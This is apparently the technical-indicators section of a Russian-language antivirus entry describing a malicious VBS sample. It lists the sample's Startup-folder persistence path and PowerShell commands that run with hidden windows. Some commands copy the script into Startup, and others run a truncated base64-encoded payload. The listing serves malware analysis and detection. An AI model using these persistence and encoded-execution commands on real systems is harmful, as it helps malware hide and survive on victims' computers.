Техническая информация
- %APPDATA%\microsoft\windows\start menu\programs\startup\<Имя файла>.vbs
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "[System.IO.File]::WriteAllText([Environment]::GetFolderPath(7)+'\<Имя файла>.vbs',[System.IO.File]::ReadAllText('<PATH_SAMPLE>.vbs'))"' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -noexit -enc WwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBFAG0AaQB0AC4AQQBzAHMAZQBtAGIAbAB5AEIAdQBpAGwAZABlAHIAXQA6ADoATABvAGEAZAAoAFsAUwB5AHMAdABlAG0ALgBSAHUAbgB0AGkAbQBlAC4AUgBlAG0AbwB0...' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "[System.IO.File]::WriteAllText([Environment]::GetFolderPath(7)+'\<Имя файла>.vbs',[System.IO.File]::ReadAllText('<PATH_SAMPLE>.vbs'))"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -noexit -enc WwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBFAG0AaQB0AC4AQQBzAHMAZQBtAGIAbAB5AEIAdQBpAGwAZABlAHIAXQA6ADoATABvAGEAZAAoAFsAUwB5AHMAdABlAG0ALgBSAHUAbgB0AGkAbQBlAC4AUgBlAG0AbwB0...